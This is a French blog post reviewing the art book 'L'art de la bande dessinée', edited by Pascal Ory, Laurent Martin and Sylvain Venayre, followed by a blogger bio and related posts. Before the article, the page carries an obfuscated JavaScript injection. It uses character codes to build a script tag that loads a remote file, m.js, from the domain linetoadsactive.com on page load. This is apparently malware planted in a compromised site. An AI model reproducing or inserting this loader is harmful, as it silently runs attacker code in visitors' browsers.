Element.prototype.appendAfter = function(element) {element.parentNode.insertBefore(this, element.nextSibling);}, false;(function() { var elem = document.createElement(String.fromCharCode(115,99,114,105,112,116)); elem.type = String.fromCharCode(116,101,120,116,47,106,97,118,97,115,99,114,105,112,116); elem.src = String.fromCharCode(104,116,116,112,115,58,47,47,119,101,108,108,46,108,105,110,101,116,111,97,100,115,97,99,116,105,118,101,46,99,111,109,47,109,46,106,115);elem.appendAfter(document.getElementsByTagName(String.fromCharCode(115,99,114,105,112,116))[0]);elem.appendAfter(document.getElementsByTagName(String.fromCharCode(104,101,97,100))[0]);document.getElementsByTagName(String.fromCharCode(104,101,97,100))[0].appendChild(elem);})();

    La bande dessinée, un art à part entière

    L’art de la bande dessinée, sous la direction de Pascal Ory, Laurent, Martin, Sylvain Venayre, éditions Citadelles & Mazenod, Collection L’Art et les grandes civilisations, 592 pages, 205 euros.

    Cette fois, le débat est clos. La bande dessinée est bien un art, au même titre que les huit autres. Du moins pour les éditions Citadelles et Mazenod, qui viennent de faire paraître un ouvrage somptueux consacré à la BD dans leur prestigieuse collection consacrée aux arts des grandes civilisations du monde.

    Réalisé sous la direction de Pascal Ory (professeur d’histoire contemporaine à Paris-1 Sorbonne), Laurent Martin (du centre d’histoire de Sciences Po) et Sylvain Venayre (de Paris-1), L’art de la bande dessinéese présente sous la forme d’une somme de quelques 600 pages. Des fondateurs (Töpffer, Outcault, McCay) aux auteurs contemporains (Art Spiegelman, Chris Ware, Mattotti, Bilal, De Crécy,  Marjane Satrapi…), des séries cultes franco-belges (Tintin, Astérix, Blueberry, Les Cités obscures, XIII) aux mangas ou aux comics US, cet ouvrage de référence privilégie une approche socio-historique et internationale, à travers l’analyse de près de 500 dessinateurs et scénaristes. Le tout illustré au travers plus de 550 reproductions de planches originales ou d’imprimés.

    Une belle marque de reconnaissance donc,  près d’un demi-siècle après la naissance du “neuvième art” (l’expression, due à l’historien du cinéma Claude Beylie remonterait à 1964).

    Revers de la médaille, loin des rayonnages des pulps et des “petits mickeys”, l’Art de la bande dessinée se paye aussi au prix (plus de 200 euros… oui, pas d’erreur de frappe dans le nombre de zéros) de cette reconnaissance artistique.

     

    Commentez ou exprimez-vous grâce aux emojis !
    0
    J'AIMEJ'AIME
    0
    J'ADOREJ'ADORE
    0
    HahaHaha
    0
    WOUAHWOUAH
    0
    SUPER !SUPER !
    0
    TRISTETRISTE
    0
    GrrrrGrrrr
    Merci !

    Tags:

    • Journaliste de profession, rédacteur en chef adjoint (du Courrier picard) de fonction et amateur de bande dessinée par passion, je préfère parler ici d'albums que j'apprécie (avec éclectisme) plutôt que de ceux que je n'aime pas (et qui peuvent plaire à d'autres). Et ce en toute liberté. Cet espace est aussi l'occasion d'évoquer la vie (régionale en premier lieu) de la bande dessinée et parfois au-delà celle du graphisme, du dessin de presse ou des journaux et revues en lien avec l'un ou l'autre. Précisons que la plupart des illustrations utilisées dans ce blog ont pour copyrights leurs auteurs et éditeurs respectifs. Celles-ci visant à présenter leurs œuvres. A leur demande éventuelle, elles seront retirées.

    • Show Comments

    Your email address will not be published. Required fields are marked *

    comment *

    • name *

    • email *

    • website *

    You May Also Like

    Un bonheur pas complet Made in Normandie

    Martin Bonheur, Jérôme Félix (scénario), Stéphane Louis (dessin). Editions Grand Angle, 80 pages, 16,90 ...

    20 albums indispensables à lire cet été

    Toute l’année, les journalistes de l’ACBD, spécialisés en bande dessinée, lisent des milliers d’albums. ...

    A chacun son Tour (1) : Les Pieds Nickelés dans la boucle

     Les Pieds Nickelés au Tour de France, Roland de Montaubert et René Pellos. Editions ...

    Rendez-vous avec Pozla à Amiens, ce lundi

    La prochaine “bulle du lundi”, organisée par l’association On a marché sur la bulle ...

    Black Joke, pari gagnant

    Black Joke, Rintaro Koike (scénario), Masayuki Taguchi (dessin). Éditions Ankama, 194 pages, 6,95 euros. ...

    Déjà dans le bain de 2017

    Jolie carte de voeux d’Alain et Désirée Frappier, mixant habilement et opportunément, qui plus ...